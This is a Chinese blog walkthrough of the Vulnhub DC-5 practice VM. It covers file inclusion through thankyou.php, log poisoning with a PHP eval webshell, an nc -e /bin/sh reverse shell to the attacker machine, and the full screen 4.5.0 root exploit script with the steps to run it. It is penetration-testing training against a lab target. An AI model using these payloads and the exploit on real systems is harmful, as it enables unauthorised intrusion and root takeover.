Vulnhub靶機(jī)入門系列DC:5

DC-5

? 題目描述:

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).
As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it **is** there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will **hopefully** provide some kind of idea as to what the vulnerability might involve.
And just for the record, there is no phpmailer exploit involved. :-)
The ultimate goal of this challenge is to get root and to read the one and only flag.

描述中說到something that changes with a refresh of a page(隨著頁面刷新而改變的東西)野来,這里我們留意一下。并且靶機(jī)只有一個flag

知識點(diǎn)總結(jié):

? ①端口掃描(熟悉常用的幾個端口是哪個服務(wù))

? ②文件包含漏洞

? ③利用文件包含寫入shell

? ④screen提權(quán)

1.使用命令列出局域網(wǎng)內(nèi)所有主機(jī)

? arp-scan -l

image

獲得目標(biāo)主機(jī)IP:192.168.2.118

2.使用nmap掃描目標(biāo)主機(jī)查看開放端口

root@kali:~#nmap -sV -p- 192.168.2.118 
參數(shù)說明:                
        -sV 用來掃描目標(biāo)主機(jī)和端口上運(yùn)行的軟件的版本
        -p 80 指定80端口
        -p- 掃描0-65535全部端口
image

可以看到開放了80端口,代表有web服務(wù),直接訪問

常用端口參考鏈接

3.訪問IP查看web內(nèi)容

image

在contact模塊發(fā)現(xiàn)了留言板的功能春弥,隨便輸入測試一下

image

看到請求被提交到了thankyou.php,并且有參數(shù)距芬,為GET方式傳參纺念。從題目描述中我們也知道提示到了刷新,我們刷新下頁面看下

image

被圈住的地方每當(dāng)刷新一次都會改變敢会,有此我們可以聯(lián)想到可能有文件包含漏洞

我們現(xiàn)在先掃一下目錄看一下是哪個文件被包含進(jìn)來

使用DirBuster掃描目錄

image

可以發(fā)現(xiàn)有一個footer.php 訪問一下正好驗(yàn)證文件包含的漏洞

image

4.測試文件包含參數(shù)

那么我們現(xiàn)在就要確定文件包含的參數(shù)是哪一個曾沈,一般page ,file鸥昏,filename用的比較多塞俱,我們可以試一下,如果不是我們也可以用kali里邊自帶的字典進(jìn)行fuzz

image

由此吏垮,我們可以確定參數(shù)為file

我們現(xiàn)在可以對文件進(jìn)行讀取了障涯,但是我們的目的是獲取shell,如果只讀取文件是無法完成的膳汪,我們需要往里邊寫東西唯蝶,于是可以想到利用日志文件,將shell寫入日志文件 然后進(jìn)行文件包含

image

可以看到網(wǎng)站是Nginx的遗嗽,Nginx 的日志默認(rèn)路徑是

/var/log/nginx/error.log

/var/log/nginx/access.log

我們也可以用過FuzzDB提供的字典進(jìn)行爆破日志的位置字典鏈接

image

有了日志文件位置粘我,接下來就要往日志文件寫一句話木馬

5.寫入一句話木馬

?file=<?php @eval($_POST[123]);?>

image

查看日志文件

image

可以看到一句話木馬已經(jīng)被寫進(jìn)日志文件了

使用蟻劍進(jìn)行連接

image

6.我們用nc反彈一個shell到我們的kali機(jī)

? 首先在kali機(jī)上nc -nlvp 1234

? 然后使用 nc -e /bin/sh IP port 來反彈

image

因?yàn)檫@個shell不是很穩(wěn)定,我們用python換一個shell

python -c 'import pty; pty.spawn("/bin/bash")'

7.接下來進(jìn)行提權(quán)

? 首先我們要查找目前用戶有什么root權(quán)限的命令(下邊兩行命令都可以查詢)

find / -user root -perm -4000 -print 2>/dev/null         

find / -perm -u=s -type f 2>/dev/null      

find / -user root -perm -4000 -exec ls -ldb {} \ ;
image

一般可以用來SUID提權(quán)的有

Nmap
Vim
find
Bash
More
Less
Nano
cp

但是我們發(fā)現(xiàn)可用的里邊沒有痹换,而且有一個screen-4.5.0的奇怪的東西征字,百度查看一下可以知道這個命令可以用來提權(quán)

我們用searchsploit搜索一下漏洞利用腳本

searchsploit screen 4.5.0
image

我們用第一個41154.sh

拷貝過來

cp /usr/share/exploitdb/exploits/linux/local/41154.sh  41154.sh

直接上傳這個腳本執(zhí)行不了

查看一下腳本如何利用

cat 41154.sh

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so... 
/tmp/rootshell

第一步

? 將第一步分的c代碼放入libhax.c中 然后進(jìn)行編譯

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

第二步

? 將第二部分c代碼放入rootshell.c中進(jìn)行編譯

gcc -o /tmp/rootshell /tmp/rootshell.c

第三步

? 通過nc將文件傳輸?shù)侥繕?biāo)機(jī)的tmp文件夾,因?yàn)閠mp文件夾的權(quán)限一般很大娇豫,或者也可以直接用蟻劍傳輸

kali:
nc -nlvp 1234 < libhax.so
nc -nlvp 1234 < rootshell
目標(biāo)機(jī):
nc 192.168.2.135 1234 > libhax.so
nc 192.168.2.135 1234 > rootshell
image

第四步

我們按照腳本里邊的命令一步一步執(zhí)行就可以了

$cd /etc
$umask 000
$screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
$screen -ls
$/tmp/rootshell

提權(quán)成功

在root目錄下找到flag

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末匙姜,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子冯痢,更是在濱河造成了極大的恐慌氮昧,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,214評論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件浦楣,死亡現(xiàn)場離奇詭異袖肥,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)椒振,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,307評論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門昭伸,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人澎迎,你說我怎么就攤上這事庐杨⊙〉鳎” “怎么了?”我有些...
    開封第一講書人閱讀 152,543評論 0 341
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵灵份,是天一觀的道長仁堪。 經(jīng)常有香客問我,道長填渠,這世上最難降的妖魔是什么弦聂? 我笑而不...
    開封第一講書人閱讀 55,221評論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮氛什,結(jié)果婚禮上莺葫,老公的妹妹穿的比我還像新娘。我一直安慰自己枪眉,他們只是感情好捺檬,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,224評論 5 371
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著贸铜,像睡著了一般堡纬。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上蒿秦,一...
    開封第一講書人閱讀 49,007評論 1 284
  • 城市分裂傳說
    那天烤镐,我揣著相機(jī)與錄音,去河邊找鬼棍鳖。 笑死炮叶,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的渡处。 我是一名探鬼主播悴灵,決...
    沈念sama閱讀 38,313評論 3 399
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼骂蓖!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起川尖,我...
    開封第一講書人閱讀 36,956評論 0 259
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對情侶失蹤登下,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后叮喳,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體被芳,經(jīng)...
    沈念sama閱讀 43,441評論 1 300
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,925評論 2 323
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年馍悟,在試婚紗的時候發(fā)現(xiàn)自己被綠了畔濒。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,018評論 1 333
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡锣咒,死狀恐怖侵状,靈堂內(nèi)的尸體忽然破棺而出赞弥,到底是詐尸還是另有隱情,我是刑警寧澤趣兄,帶...
    沈念sama閱讀 33,685評論 4 322
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布绽左,位于F島的核電站,受9級特大地震影響艇潭,放射性物質(zhì)發(fā)生泄漏拼窥。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,234評論 3 307
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一蹋凝、第九天 我趴在偏房一處隱蔽的房頂上張望鲁纠。 院中可真熱鬧,春花似錦鳍寂、人聲如沸改含。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,240評論 0 19
  • 一樁弒父案伐割,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽候味。三九已至,卻和暖如春隔心,著一層夾襖步出監(jiān)牢的瞬間白群,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,464評論 1 261
  • 情欲美人皮
    我被黑心中介騙來泰國打工硬霍, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留帜慢,地道東北人。 一個月前我還...
    沈念sama閱讀 45,467評論 2 352
  • 代替公主和親
    正文 我出身青樓唯卖,卻偏偏與公主長得像粱玲,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子拜轨,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,762評論 2 345

推薦閱讀更多精彩內(nèi)容

  • 標(biāo)簽:本地文件包含(LFI)抽减、FUZZ、PHP偽協(xié)議橄碾、nginx日志文件寫一句話卵沉、反彈shell、screen提權(quán)...
    z1掛東南閱讀 1,365評論 0 1
  • DC-6 題目描述 描述中說到和之前一樣只有一個Flag法牲,并且需要配置一下HOSTS史汗,且給了提示 知識點(diǎn)總結(jié) ? ...
    Const_L閱讀 776評論 0 1
  • 實(shí)驗(yàn)環(huán)境 kali2020版本: ip 172.25.0.69DC5: MAC 00:0c:29:b2:15:58...
    xioooZorro閱讀 862評論 0 1
  • 看更多:我的博客 Vulnhub 簡介 Vulnhub是一個提供各種漏洞環(huán)境的靶場平臺,大部分環(huán)境是做好的虛擬機(jī)鏡...
    簡言之_閱讀 5,670評論 0 3
  • 久違的晴天拒垃,家長會停撞。 家長大會開好到教室時,離放學(xué)已經(jīng)沒多少時間了悼瓮。班主任說已經(jīng)安排了三個家長分享經(jīng)驗(yàn)戈毒。 放學(xué)鈴聲...
    飄雪兒5閱讀 7,493評論 16 22